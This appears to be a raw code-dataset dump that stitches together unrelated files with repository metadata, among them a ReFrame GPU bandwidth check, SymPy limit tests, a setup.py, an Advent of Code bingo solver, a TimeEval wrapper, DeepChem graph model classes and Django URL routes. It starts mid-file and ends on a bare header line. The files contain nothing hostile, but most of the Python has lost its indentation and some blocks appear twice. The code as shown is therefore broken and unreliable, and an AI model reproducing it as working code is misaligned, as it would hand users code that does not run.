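    # Drop every row that originated from the excluded file.
    file_exclude(demo_df, "source_file", ["bad_extract.csv"]).show()
    spark.stop()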
cscs-checks/cuda/multi_gpu.py | hpc-unibe-ch/reframe | 0 | 8568 | <reponame>hpc-unibe-ch/reframe<gh_stars>0
# Copyright 2016-2020 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import os
import reframe.utility.sanity as sn
import reframe as rfm
@rfm.required_version('>=2.16-dev0')
@rfm.simple_test
class GpuBandwidthCheck(rfm.RegressionTest):
def __init__(self):
self.valid_systems = ['kesch:cn', 'daint:gpu', 'dom:gpu', 'tiger:gpu',
'arolla:cn', 'tsa:cn']
self.valid_prog_environs = ['PrgEnv-gnu']
if self.current_system.name in ['arolla', 'kesch', 'tsa']:
self.valid_prog_environs = ['PrgEnv-gnu-nompi']
self.exclusive_access = True
self.sourcesdir = os.path.join(
self.current_system.resourcesdir, 'CUDA', 'essentials'
)
self.build_system = 'SingleSource'
# Set nvcc flags
nvidia_sm = '60'
if self.current_system.name == 'kesch':
nvidia_sm = '37'
elif self.current_system.name in ['arolla', 'tsa']:
nvidia_sm = '70'
self.build_system.cxxflags = ['-I.', '-m64', '-arch=sm_%s' % nvidia_sm]
self.sourcepath = 'bandwidthtestflex.cu'
self.executable = 'gpu_bandwidth_check.x'
# Perform a single bandwidth test with a buffer size of 1024MB
self.min_buffer_size = 1073741824
self.max_buffer_size = 1073741824
self.executable_opts = ['device', 'all', '--mode=range',
'--start=%d' % self.min_buffer_size,
'--increment=%d' % self.min_buffer_size,
'--end=%d' % self.max_buffer_size, '--csv']
self.num_tasks = 0
self.num_tasks_per_node = 1
if self.current_system.name in ['daint', 'dom', 'tiger']:
self.modules = ['craype-accel-nvidia60']
self.num_gpus_per_node = 1
elif self.current_system.name == 'kesch':
self.modules = ['cudatoolkit/8.0.61']
self.num_gpus_per_node = 8
elif self.current_system.name in ['arolla', 'tsa']:
self.modules = ['cuda/10.1.243']
self.num_gpus_per_node = 8
# perf_patterns and reference will be set by the sanity check function
self.sanity_patterns = self.do_sanity_check()
self.perf_patterns = {}
self.reference = {}
self.__bwref = {
# FIXME: reference values for Arolla and Tsa need to be updated
# (sanity check fails if they are not defined)
'arolla:cn:h2d': (7583, -0.1, None, 'MB/s'),
'arolla:cn:d2h': (7584, -0.1, None, 'MB/s'),
'arolla:cn:d2d': (137408, -0.1, None, 'MB/s'),
'daint:gpu:h2d': (11881, -0.1, None, 'MB/s'),
'daint:gpu:d2h': (12571, -0.1, None, 'MB/s'),
'daint:gpu:d2d': (499000, -0.1, None, 'MB/s'),
'dom:gpu:h2d': (11881, -0.1, None, 'MB/s'),
'dom:gpu:d2h': (12571, -0.1, None, 'MB/s'),
'dom:gpu:d2d': (499000, -0.1, None, 'MB/s'),
'kesch:cn:h2d': (7583, -0.1, None, 'MB/s'),
'kesch:cn:d2h': (7584, -0.1, None, 'MB/s'),
'kesch:cn:d2d': (137408, -0.1, None, 'MB/s'),
'tiger:gpu:h2d': (0, None, None, 'MB/s'),
'tiger:gpu:d2h': (0, None, None, 'MB/s'),
'tiger:gpu:d2d': (0, None, None, 'MB/s'),
'tsa:cn:h2d': (7583, -0.1, None, 'MB/s'),
'tsa:cn:d2h': (7584, -0.1, None, 'MB/s'),
'tsa:cn:d2d': (137408, -0.1, None, 'MB/s'),
}
self.tags = {'diagnostic', 'benchmark', 'mch',
'craype', 'external-resources'}
self.maintainers = ['AJ', 'SK']
def _xfer_pattern(self, xfer_kind, devno, nodename):
'''generates search pattern for performance analysis'''
if xfer_kind == 'h2d':
first_part = 'bandwidthTest-H2D-Pinned'
elif xfer_kind == 'd2h':
first_part = 'bandwidthTest-D2H-Pinned'
else:
first_part = 'bandwidthTest-D2D'
# Extract the bandwidth corresponding to the maximum buffer size
return (r'^%s[^,]*,\s*%s[^,]*,\s*Bandwidth\s*=\s*(\S+)\s*MB/s([^,]*,)'
r'{2}\s*Size\s*=\s*%d\s*bytes[^,]*,\s*DeviceNo\s*=\s*-1'
r':%s' % (nodename, first_part, self.max_buffer_size, devno))
@sn.sanity_function
def do_sanity_check(self):
failures = []
devices_found = set(sn.extractall(
r'^\s*([^,]*),\s*Detected devices: %s' % self.num_gpus_per_node,
self.stdout, 1
))
sn.evaluate(sn.assert_eq(
self.job.num_tasks, len(devices_found),
msg='requested {0} node(s), got {1} (nodelist: %s)' %
','.join(sorted(devices_found))))
good_nodes = set(sn.extractall(
r'^\s*([^,]*),\s*NID\s*=\s*\S+\s+Result = PASS',
self.stdout, 1
))
sn.evaluate(sn.assert_eq(
devices_found, good_nodes,
msg='check failed on the following node(s): %s' %
','.join(sorted(devices_found - good_nodes)))
)
# Sanity is fine, fill in the perf. patterns based on the exact node id
for nodename in devices_found:
for xfer_kind in ('h2d', 'd2h', 'd2d'):
for devno in range(self.num_gpus_per_node):
                    perfvar = 'bw_%s_%s_gpu_%s' % (xfer_kind, nodename, devno)
self.perf_patterns[perfvar] = sn.extractsingle(
self._xfer_pattern(xfer_kind, devno, nodename),
self.stdout, 1, float, 0
)
partname = self.current_partition.fullname
refkey = '%s:%s' % (partname, perfvar)
bwkey = '%s:%s' % (partname, xfer_kind)
self.reference[refkey] = self.__bwref[bwkey]
        return True
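# Each reference entry above follows ReFrame's (value, lower_threshold, upper_threshold,
# unit) convention, where the thresholds are relative deviations from the value. The
# helper below is a stand-alone illustration of how such a tuple maps to an accepted
# bandwidth band; it is not used by ReFrame or by the check itself.
def _within_reference(measured, reference):
    """Return True if `measured` falls inside the band allowed by `reference`."""
    value, lower, upper, _unit = reference
    low_bound = value * (1 + lower) if lower is not None else float("-inf")
    high_bound = value * (1 + upper) if upper is not None else float("inf")
    return low_bound <= measured <= high_bound

# Example: _within_reference(12000, (11881, -0.1, None, 'MB/s')) is True, while
# 10000 MB/s would fail because the allowed floor is 11881 * 0.9 = 10692.9 MB/s
# and no upper bound is enforced.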
sympy/series/tests/test_demidovich.py | msgoff/sympy | 0 | 8569 | from sympy import (
limit,
Symbol,
oo,
sqrt,
Rational,
log,
exp,
cos,
sin,
tan,
pi,
asin,
together,
root,
S,
)
# Numbers listed with the tests refer to problem numbers in the book
# "Anti-demidovich, problemas resueltos, Ed. URSS"
x = Symbol("x")
def test_leadterm():
assert (3 + 2 * x ** (log(3) / log(2) - 1)).leadterm(x) == (3, 0)
def root3(x):
return root(x, 3)
def root4(x):
return root(x, 4)
def test_Limits_simple_0():
assert limit((2 ** (x + 1) + 3 ** (x + 1)) / (2 ** x + 3 ** x), x, oo) == 3 # 175
def test_Limits_simple_1():
assert limit((x + 1) * (x + 2) * (x + 3) / x ** 3, x, oo) == 1 # 172
assert limit(sqrt(x + 1) - sqrt(x), x, oo) == 0 # 179
assert (
limit((2 * x - 3) * (3 * x + 5) * (4 * x - 6) / (3 * x ** 3 + x - 1), x, oo)
== 8
) # Primjer 1
assert limit(x / root3(x ** 3 + 10), x, oo) == 1 # Primjer 2
assert limit((x + 1) ** 2 / (x ** 2 + 1), x, oo) == 1 # 181
def test_Limits_simple_2():
assert limit(1000 * x / (x ** 2 - 1), x, oo) == 0 # 182
assert limit((x ** 2 - 5 * x + 1) / (3 * x + 7), x, oo) is oo # 183
assert limit((2 * x ** 2 - x + 3) / (x ** 3 - 8 * x + 5), x, oo) == 0 # 184
assert limit((2 * x ** 2 - 3 * x - 4) / sqrt(x ** 4 + 1), x, oo) == 2 # 186
assert limit((2 * x + 3) / (x + root3(x)), x, oo) == 2 # 187
assert limit(x ** 2 / (10 + x * sqrt(x)), x, oo) is oo # 188
assert limit(root3(x ** 2 + 1) / (x + 1), x, oo) == 0 # 189
assert limit(sqrt(x) / sqrt(x + sqrt(x + sqrt(x))), x, oo) == 1 # 190
def test_Limits_simple_3a():
a = Symbol("a")
# issue 3513
assert together(limit((x ** 2 - (a + 1) * x + a) / (x ** 3 - a ** 3), x, a)) == (
a - 1
) / (
3 * a ** 2
) # 196
def test_Limits_simple_3b():
h = Symbol("h")
assert limit(((x + h) ** 3 - x ** 3) / h, h, 0) == 3 * x ** 2 # 197
assert limit((1 / (1 - x) - 3 / (1 - x ** 3)), x, 1) == -1 # 198
assert (
limit((sqrt(1 + x) - 1) / (root3(1 + x) - 1), x, 0) == Rational(3) / 2
) # Primer 4
assert limit((sqrt(x) - 1) / (x - 1), x, 1) == Rational(1) / 2 # 199
assert limit((sqrt(x) - 8) / (root3(x) - 4), x, 64) == 3 # 200
assert limit((root3(x) - 1) / (root4(x) - 1), x, 1) == Rational(4) / 3 # 201
assert (
limit((root3(x ** 2) - 2 * root3(x) + 1) / (x - 1) ** 2, x, 1)
== Rational(1) / 9
) # 202
def test_Limits_simple_4a():
a = Symbol("a")
assert limit((sqrt(x) - sqrt(a)) / (x - a), x, a) == 1 / (2 * sqrt(a)) # Primer 5
assert limit((sqrt(x) - 1) / (root3(x) - 1), x, 1) == Rational(3, 2) # 205
assert limit((sqrt(1 + x) - sqrt(1 - x)) / x, x, 0) == 1 # 207
assert limit(sqrt(x ** 2 - 5 * x + 6) - x, x, oo) == Rational(-5, 2) # 213
def test_limits_simple_4aa():
assert limit(x * (sqrt(x ** 2 + 1) - x), x, oo) == Rational(1) / 2 # 214
def test_Limits_simple_4b():
# issue 3511
assert limit(x - root3(x ** 3 - 1), x, oo) == 0 # 215
def test_Limits_simple_4c():
assert limit(log(1 + exp(x)) / x, x, -oo) == 0 # 267a
assert limit(log(1 + exp(x)) / x, x, oo) == 1 # 267b
def test_bounded():
assert limit(sin(x) / x, x, oo) == 0 # 216b
assert limit(x * sin(1 / x), x, 0) == 0 # 227a
def test_f1a():
# issue 3508:
assert limit((sin(2 * x) / x) ** (1 + x), x, 0) == 2 # Primer 7
def test_f1a2():
# issue 3509:
assert limit(((x - 1) / (x + 1)) ** x, x, oo) == exp(-2) # Primer 9
def test_f1b():
m = Symbol("m")
n = Symbol("n")
h = Symbol("h")
a = Symbol("a")
assert limit(sin(x) / x, x, 2) == sin(2) / 2 # 216a
assert limit(sin(3 * x) / x, x, 0) == 3 # 217
assert limit(sin(5 * x) / sin(2 * x), x, 0) == Rational(5, 2) # 218
assert limit(sin(pi * x) / sin(3 * pi * x), x, 0) == Rational(1, 3) # 219
assert limit(x * sin(pi / x), x, oo) == pi # 220
assert limit((1 - cos(x)) / x ** 2, x, 0) == S.Half # 221
assert limit(x * sin(1 / x), x, oo) == 1 # 227b
assert limit((cos(m * x) - cos(n * x)) / x ** 2, x, 0) == (
(n ** 2 - m ** 2) / 2
) # 232
assert limit((tan(x) - sin(x)) / x ** 3, x, 0) == S.Half # 233
assert limit((x - sin(2 * x)) / (x + sin(3 * x)), x, 0) == -Rational(1, 4) # 237
assert limit((1 - sqrt(cos(x))) / x ** 2, x, 0) == Rational(1, 4) # 239
assert limit((sqrt(1 + sin(x)) - sqrt(1 - sin(x))) / x, x, 0) == 1 # 240
assert limit((1 + h / x) ** x, x, oo) == exp(h) # Primer 9
assert limit((sin(x) - sin(a)) / (x - a), x, a) == cos(a) # 222, *176
assert limit((cos(x) - cos(a)) / (x - a), x, a) == -sin(a) # 223
assert limit((sin(x + h) - sin(x)) / h, h, 0) == cos(x) # 225
def test_f2a():
assert limit(((x + 1) / (2 * x + 1)) ** (x ** 2), x, oo) == 0 # Primer 8
def test_f2():
assert limit((sqrt(cos(x)) - root3(cos(x))) / (sin(x) ** 2), x, 0) == -Rational(
1, 12
) # *184
def test_f3():
a = Symbol("a")
# issue 3504
    assert limit(asin(a * x) / x, x, 0) == a
notion/ctx.py | jfhbrook/notion-tools | 1 | 8570 | from notion.client import NotionClient
from notion.settings import Settings
class Context:
def __init__(self):
self.settings = Settings.from_file()
self._client = None
def get_client(self):
if not self._client:
self.settings.validate()
self._client = NotionClient(token_v2=self.settings.token, monitor=False)
return self._client
def update_settings(self, **kwargs):
        self.settings = self.settings.update(**kwargs)
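# Typical usage sketch (illustrative only; it assumes a settings file with a valid
# token already exists on disk):
#
#   ctx = Context()
#   client = ctx.get_client()   # validates settings, then lazily builds a NotionClient
#   client2 = ctx.get_client()  # returns the same cached client instance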
setup.py | rgooler/bootstrap-pip | 0 | 8571 | <filename>setup.py
#!/usr/bin/env python
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
install_requires = []
# install_requires = ['requests >= 2.1.0']
# For SNI support in Python 2, must install the following packages
# if sys.version_info[0] == 2:
# install_requires.append('pyOpenSSL >= 0.14')
# install_requires.append('ndg-httpsclient >= 0.3.3')
# install_requires.append('pyasn1 >= 0.1.7')
setup(
name='mymodule',
packages=['mymodule'],
version='0.1',
description='Desc',
long_description=(read('README.rst') + '\n\n' +
read('HISTORY.rst') + '\n\n' +
read('AUTHORS.rst')),
url='http://github.com/rgooler/bootstrap-pip/',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
py_modules=['mymodule'],
install_requires=install_requires,
include_package_data=True,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],
)
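# The commented-out sys.version_info guard above predates PEP 508 environment markers.
# A marker-based sketch of the same intent (untested here) would be:
#
#   install_requires = [
#       'pyOpenSSL >= 0.14; python_version < "3"',
#       'ndg-httpsclient >= 0.3.3; python_version < "3"',
#       'pyasn1 >= 0.1.7; python_version < "3"',
#   ]
#
# which lets pip resolve the Python-2-only dependencies at install time.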
cfdata/tabular/converters/__init__.py | carefree0910/carefree-data | 9 | 8572 | from .base import *
from .string import *
from .categorical import *
from .numerical import *
__all__ = ["Converter", "converter_dict"]
| from .base import *
from .string import *
from .categorical import *
from .numerical import *
__all__ = ["Converter", "converter_dict"]
| none | 1 | 1.075889 | 1 |
hello_world.py | BronWang/first_github | 0 | 8573 | def hello_world():
"""打印Hello world"""
message = 'hello world'
print(message.title())
hello_world()
| def hello_world():
"""打印Hello world"""
message = 'hello world'
print(message.title())
hello_world()
| zh | 0.20271 | 打印Hello world | 2.750768 | 3 |
Python/Samples/Observer/UtObserver.py | plasroom46/DesignPattern.Sample | 9 | 8574 | import unittest
from Observers import Observer, ObserverMailServer, ObserverPbx
from Subjects import Subject, SubjectEflow
class UtVisitor(unittest.TestCase):
def test_observer(self):
# Create observers
pbx = ObserverPbx()
ms = ObserverMailServer()
# Create subject
subject = SubjectEflow()
subject.attach(pbx)
subject.attach(ms)
# Notify when JB is leave of absence
subject.notify("JB", "Hachi")
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
| import unittest
from Observers import Observer, ObserverMailServer, ObserverPbx
from Subjects import Subject, SubjectEflow
class UtVisitor(unittest.TestCase):
def test_observer(self):
# Create observers
pbx = ObserverPbx()
ms = ObserverMailServer()
# Create subject
subject = SubjectEflow()
subject.attach(pbx)
subject.attach(ms)
# Notify when JB is leave of absence
subject.notify("JB", "Hachi")
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
| en | 0.831654 | # Create observers # Create subject # Notify when JB is leave of absence | 3.040535 | 3 |
modules/voxelman/config.py | Relintai/pandemonium_engine | 0 | 8575 |
def can_build(env, platform):
return True
def configure(env):
pass
def get_doc_classes():
return [
"WorldArea",
"VoxelLight",
"VoxelLightNode",
"VoxelLevelGenerator",
"VoxelLevelGeneratorFlat",
"VoxelSurfaceMerger",
"VoxelSurfaceSimple",
"VoxelSurface",
"VoxelLibraryMerger",
"VoxelLibrarySimple",
"VoxelLibrary",
"VoxelLibraryMergerPCM",
"VoxelMaterialCache",
"VoxelMaterialCachePCM",
"VoxelCubePoints",
"VoxelMesherCubic",
"VoxelMeshData",
"MarchingCubesCellData",
"VoxelMesherMarchingCubes",
"VoxelMesher",
"EnvironmentData",
"VoxelChunk",
"VoxelChunkDefault",
"VoxelStructure",
"BlockVoxelStructure",
"VoxelWorld",
"VoxelMesherBlocky",
"VoxelWorldBlocky",
"VoxelChunkBlocky",
"VoxelMesherLiquidBlocky",
"VoxelWorldMarchingCubes",
"VoxelChunkMarchingCubes",
"VoxelMesherCubic",
"VoxelWorldCubic",
"VoxelChunkCubic",
"VoxelMesherDefault",
"VoxelWorldDefault",
"VoxelJob",
"VoxelTerrainJob",
"VoxelLightJob",
"VoxelPropJob",
"VoxelMesherJobStep",
]
def get_doc_path():
return "doc_classes"
|
def can_build(env, platform):
return True
def configure(env):
pass
def get_doc_classes():
return [
"WorldArea",
"VoxelLight",
"VoxelLightNode",
"VoxelLevelGenerator",
"VoxelLevelGeneratorFlat",
"VoxelSurfaceMerger",
"VoxelSurfaceSimple",
"VoxelSurface",
"VoxelLibraryMerger",
"VoxelLibrarySimple",
"VoxelLibrary",
"VoxelLibraryMergerPCM",
"VoxelMaterialCache",
"VoxelMaterialCachePCM",
"VoxelCubePoints",
"VoxelMesherCubic",
"VoxelMeshData",
"MarchingCubesCellData",
"VoxelMesherMarchingCubes",
"VoxelMesher",
"EnvironmentData",
"VoxelChunk",
"VoxelChunkDefault",
"VoxelStructure",
"BlockVoxelStructure",
"VoxelWorld",
"VoxelMesherBlocky",
"VoxelWorldBlocky",
"VoxelChunkBlocky",
"VoxelMesherLiquidBlocky",
"VoxelWorldMarchingCubes",
"VoxelChunkMarchingCubes",
"VoxelMesherCubic",
"VoxelWorldCubic",
"VoxelChunkCubic",
"VoxelMesherDefault",
"VoxelWorldDefault",
"VoxelJob",
"VoxelTerrainJob",
"VoxelLightJob",
"VoxelPropJob",
"VoxelMesherJobStep",
]
def get_doc_path():
return "doc_classes"
| none | 1 | 1.747734 | 2 |
|
Python/2021/day_04/day_04.py | JonoRicci/Advent-Of-Code | 0 | 8576 | <gh_stars>0
"""
Day 04
"""
from logger import logger
def main() -> None:
"""
Import the puzzle input, process and display the results.
"""
puzzle_input = import_list()
logger.debug(puzzle_input)
final_score = play_bingo(puzzle_input)
for result in final_score:
logger.info(f"The final score is: {result}.")
def import_list() -> list:
"""
Import the puzzle input and return a list.
:return: Puzzle input text file as list
:rtype: list
"""
file = open("puzzle-input", "r")
string_list = file.read().splitlines()
file.close()
return string_list
def play_bingo(bingo_cards: list) -> list:
"""
Extract winning numbers, bingo boards from input.
Make a separate 2D list tracking wins.
For each winning number, check every board row and column for a match.
Add matches to the 2D list tracking wins.
Once done, check 2D list for winning columns / rows.
Add winning boards to new list along with winning number.
Multiply to get score.
:param bingo_cards: puzzle input where each line is a string
:return: First and last winning board score
:rtype: list
"""
winning_numbers = [int(x) for x in bingo_cards[0].split(",")]
logger.debug(f" Winning numbers: {winning_numbers}")
single_board = []
all_boards = []
final_score_list = []
# Get Bingo Boards
for line in range(len(bingo_cards)):
if "," not in bingo_cards[line]:
row = [int(x) for x in bingo_cards[line].split()]
if row:
logger.debug(row)
single_board.append(row)
elif single_board:
all_boards.append(single_board)
single_board = []
# Set up separate 2D list tracking matches to winning numbers.
unmarked_tracker = []
for board in all_boards:
assert len(board) == 5 and len(board[0]) == 5
unmarked_tracker.append([[False for _ in range(5)] for _ in range(5)])
# Set up list to track winning boards.
winning_board = [False for _ in range(len(all_boards))]
for number in winning_numbers:
for index, board in enumerate(all_boards):
logger.debug(f"Checking board: {index} for {number}")
# Check for winning numbers.
for row in range(5):
for column in range(5):
if board[row][column] == number:
logger.debug(f"{unmarked_tracker[index][row][column]} "
f"is True.")
unmarked_tracker[index][row][column] = True
# Check for 5 in a row.
won = False
for row in range(5):
ok = True
for column in range(5):
if not unmarked_tracker[index][row][column]:
ok = False
if ok:
won = True
# Check for 5 in a column.
for column in range(5):
ok = True
for row in range(5):
if not unmarked_tracker[index][row][column]:
ok = False
if ok:
won = True
# Check for each winning board.
if won and not winning_board[index]:
winning_board[index] = True
winning_boards_count = len([j for j in range(len(all_boards))
if winning_board[j]])
# If first or last board.
if winning_boards_count == 1 or winning_boards_count == \
len(all_boards):
# Calculate all unmarked.
unmarked = 0
for row in range(5):
for column in range(5):
if not unmarked_tracker[index][row][column]:
unmarked += board[row][column]
final_score_list.append(unmarked * number)
logger.debug(f"The final score is: {final_score_list[-1]}, "
f"which is {unmarked} * {number}.")
return final_score_list
if __name__ == "__main__":
    main()
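# The nested row/column loops in play_bingo can also be expressed with any()/all().
# The helper below is an illustrative alternative only; the solution above does not
# use it.
def has_bingo(marks: list) -> bool:
    """Return True if any full row or column of a 5x5 boolean grid is marked."""
    full_row = any(all(row) for row in marks)
    full_column = any(all(marks[r][c] for r in range(5)) for c in range(5))
    return full_row or full_column

# Example:
#   grid = [[False] * 5 for _ in range(5)]
#   for r in range(5):
#       grid[r][2] = True   # mark the third column
#   has_bingo(grid)         # -> True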
timeeval_experiments/algorithms/eif.py | HPI-Information-Systems/TimeEval | 2 | 8577 | from durations import Duration
from typing import Any, Dict, Optional
from timeeval import Algorithm, TrainingType, InputDimensionality
from timeeval.adapters import DockerAdapter
from timeeval.params import ParameterConfig
_eif_parameters: Dict[str, Dict[str, Any]] = {
"extension_level": {
"defaultValue": None,
"description": "Extension level 0 resembles standard isolation forest. If unspecified (`None`), then `extension_level=X.shape[1] - 1`.",
"name": "extension_level",
"type": "int"
},
"limit": {
"defaultValue": None,
"description": "The maximum allowed tree depth. This is by default set to average length of unsucessful search in a binary tree.",
"name": "limit",
"type": "int"
},
"max_samples": {
"defaultValue": None,
"description": "The number of samples to draw from X to train each base estimator: `max_samples * X.shape[0]`. If unspecified (`None`), then `max_samples=min(256, X.shape[0])`.",
"name": "max_samples",
"type": "float"
},
"n_trees": {
"defaultValue": 200,
"description": "The number of decision trees (base estimators) in the forest (ensemble).",
"name": "n_trees",
"type": "int"
},
"random_state": {
"defaultValue": 42,
"description": "Seed for random number generation.",
"name": "random_state",
"type": "int"
}
}
def eif(params: ParameterConfig = None, skip_pull: bool = False, timeout: Optional[Duration] = None) -> Algorithm:
return Algorithm(
name="Extended Isolation Forest (EIF)",
main=DockerAdapter(
image_name="registry.gitlab.hpi.de/akita/i/eif",
skip_pull=skip_pull,
timeout=timeout,
group_privileges="akita",
),
preprocess=None,
postprocess=None,
param_schema=_eif_parameters,
param_config=params or ParameterConfig.defaults(),
data_as_file=True,
training_type=TrainingType.UNSUPERVISED,
input_dimensionality=InputDimensionality("multivariate")
)
| from durations import Duration
from typing import Any, Dict, Optional
from timeeval import Algorithm, TrainingType, InputDimensionality
from timeeval.adapters import DockerAdapter
from timeeval.params import ParameterConfig
_eif_parameters: Dict[str, Dict[str, Any]] = {
"extension_level": {
"defaultValue": None,
"description": "Extension level 0 resembles standard isolation forest. If unspecified (`None`), then `extension_level=X.shape[1] - 1`.",
"name": "extension_level",
"type": "int"
},
"limit": {
"defaultValue": None,
"description": "The maximum allowed tree depth. This is by default set to average length of unsucessful search in a binary tree.",
"name": "limit",
"type": "int"
},
"max_samples": {
"defaultValue": None,
"description": "The number of samples to draw from X to train each base estimator: `max_samples * X.shape[0]`. If unspecified (`None`), then `max_samples=min(256, X.shape[0])`.",
"name": "max_samples",
"type": "float"
},
"n_trees": {
"defaultValue": 200,
"description": "The number of decision trees (base estimators) in the forest (ensemble).",
"name": "n_trees",
"type": "int"
},
"random_state": {
"defaultValue": 42,
"description": "Seed for random number generation.",
"name": "random_state",
"type": "int"
}
}
def eif(params: ParameterConfig = None, skip_pull: bool = False, timeout: Optional[Duration] = None) -> Algorithm:
return Algorithm(
name="Extended Isolation Forest (EIF)",
main=DockerAdapter(
image_name="registry.gitlab.hpi.de/akita/i/eif",
skip_pull=skip_pull,
timeout=timeout,
group_privileges="akita",
),
preprocess=None,
postprocess=None,
param_schema=_eif_parameters,
param_config=params or ParameterConfig.defaults(),
data_as_file=True,
training_type=TrainingType.UNSUPERVISED,
input_dimensionality=InputDimensionality("multivariate")
)
| none | 1 | 2.235755 | 2 |
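# Usage sketch (illustrative only; attribute access on the returned Algorithm is an
# assumption about the TimeEval API, and actually running it needs a full TimeEval
# and Docker setup):
#
#   algorithm = eif(skip_pull=True)   # defaults from _eif_parameters apply
#   print(algorithm.name)             # -> "Extended Isolation Forest (EIF)"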
|
deepchem/models/tf_new_models/graph_models.py | KEHANG/deepchem | 0 | 8578 | """
Convenience classes for assembling graph models.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
__author__ = "<NAME> and <NAME>"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import tensorflow as tf
from deepchem.nn.layers import GraphGather
from deepchem.models.tf_new_models.graph_topology import GraphTopology
class SequentialGraph(object):
"""An analog of Keras Sequential class for Graph data.
Like the Sequential class from Keras, but automatically passes topology
placeholders from GraphTopology to each graph layer (from layers) added
to the network. Non graph layers don't get the extra placeholders.
"""
def __init__(self, n_feat):
"""
Parameters
----------
n_feat: int
Number of features per atom.
"""
self.graph = tf.Graph()
with self.graph.as_default():
self.graph_topology = GraphTopology(n_feat)
self.output = self.graph_topology.get_atom_features_placeholder()
# Keep track of the layers
self.layers = []
def add(self, layer):
"""Adds a new layer to model."""
with self.graph.as_default():
############################################# DEBUG
#print("start - add()")
#print("self.output")
#print(self.output)
############################################# DEBUG
# For graphical layers, add connectivity placeholders
if type(layer).__name__ in ['GraphConv', 'GraphGather', 'GraphPool']:
if (len(self.layers) > 0 and hasattr(self.layers[-1], "__name__")):
assert self.layers[-1].__name__ != "GraphGather", \
'Cannot use GraphConv or GraphGather layers after a GraphGather'
self.output = layer([self.output] +
self.graph_topology.get_topology_placeholders())
else:
self.output = layer(self.output)
############################################# DEBUG
#print("end- add()")
#print("self.output")
#print(self.output)
############################################# DEBUG
# Add layer to the layer list
self.layers.append(layer)
def get_graph_topology(self):
return self.graph_topology
def get_num_output_features(self):
"""Gets the output shape of the featurization layers of the network"""
return self.layers[-1].output_shape[1]
def return_outputs(self):
return self.output
def return_inputs(self):
return self.graph_topology.get_input_placeholders()
def get_layer(self, layer_id):
return self.layers[layer_id]
class SequentialSupportGraph(object):
"""An analog of Keras Sequential model for test/support models."""
def __init__(self, n_feat):
"""
Parameters
----------
n_feat: int
Number of atomic features.
"""
self.graph = tf.Graph()
with self.graph.as_default():
# Create graph topology and x
self.test_graph_topology = GraphTopology(n_feat, name='test')
self.support_graph_topology = GraphTopology(n_feat, name='support')
self.test = self.test_graph_topology.get_atom_features_placeholder()
self.support = self.support_graph_topology.get_atom_features_placeholder()
# Keep track of the layers
self.layers = []
# Whether or not we have used the GraphGather layer yet
self.bool_pre_gather = True
def add(self, layer):
"""Adds a layer to both test/support stacks.
Note that the layer transformation is performed independently on the
test/support tensors.
"""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphGather', 'GraphPool']:
assert self.bool_pre_gather, "Cannot apply graphical layers after gather."
self.test = layer([self.test] + self.test_graph_topology.topology)
self.support = layer([self.support] +
self.support_graph_topology.topology)
else:
self.test = layer(self.test)
self.support = layer(self.support)
if type(layer).__name__ == 'GraphGather':
self.bool_pre_gather = False # Set flag to stop adding topology
def add_test(self, layer):
"""Adds a layer to test."""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphPool', 'GraphGather']:
self.test = layer([self.test] + self.test_graph_topology.topology)
else:
self.test = layer(self.test)
def add_support(self, layer):
"""Adds a layer to support."""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphPool', 'GraphGather']:
self.support = layer([self.support] +
self.support_graph_topology.topology)
else:
self.support = layer(self.support)
def join(self, layer):
"""Joins test and support to a two input two output layer"""
with self.graph.as_default():
self.layers.append(layer)
self.test, self.support = layer([self.test, self.support])
def get_test_output(self):
return self.test
def get_support_output(self):
return self.support
def return_outputs(self):
return [self.test] + [self.support]
def return_inputs(self):
return (self.test_graph_topology.get_inputs() +
            self.support_graph_topology.get_inputs())
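# Intended driving pattern for SequentialGraph (illustrative sketch only; the layer
# constructor arguments are assumptions, while the SequentialGraph calls themselves
# come from the class above):
#
#   model = SequentialGraph(n_feat=75)
#   model.add(some_graph_conv_layer)       # graph layers also receive topology inputs
#   model.add(GraphGather(batch_size=50))  # collapses atom features per molecule
#   outputs = model.return_outputs()
#   placeholders = model.return_inputs()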
questionbank/users/urls.py | SyafiqTermizi/questionbank | 1 | 8579 |
from django.urls import path
from .views import (
UserListView, UserUpdateView, UserProfileView, UserDeleteView,
AcceptInvitationView, SpecialtyListView, SpecialtyCreateView, SpecialtyUpdateView,
SpecialtyDeleteView
)
app_name = 'users'
urlpatterns = [
path('', UserListView.as_view(), name='list'),
path('<int:pk>/', UserUpdateView.as_view(), name='update'),
path('<int:pk>/delete/', UserDeleteView.as_view(), name='delete'),
path('profile/', UserProfileView.as_view(), name='profile'),
path(
'invite/<str:token>/', AcceptInvitationView.as_view(),
name='accept_invite'
),
path('specialties/', SpecialtyListView.as_view(), name='specialty_list'),
path('specialties/create/', SpecialtyCreateView.as_view(), name='specialty_create'),
path('specialties/<int:pk>/update/', SpecialtyUpdateView.as_view(), name='specialty_update'),
path('specialties/<int:pk>/delete/', SpecialtyDeleteView.as_view(), name='specialty_delete')
]
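# --- Hedged usage sketch (not part of the original file) -------------------
# How the named routes above are typically resolved elsewhere in a Django
# project. The 'users:' namespace follows from app_name above; the exact URL
# produced depends on where the project's root URLConf includes this module,
# which is an assumption outside this file.
# from django.urls import reverse
# reverse('users:profile')                              # the profile page
# reverse('users:specialty_update', kwargs={'pk': 3})   # e.g. '/specialties/3/update/'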
qiskit_machine_learning/algorithms/regressors/neural_network_regressor.py | Zoufalc/qiskit-machine-learning | 1 | 8580 |
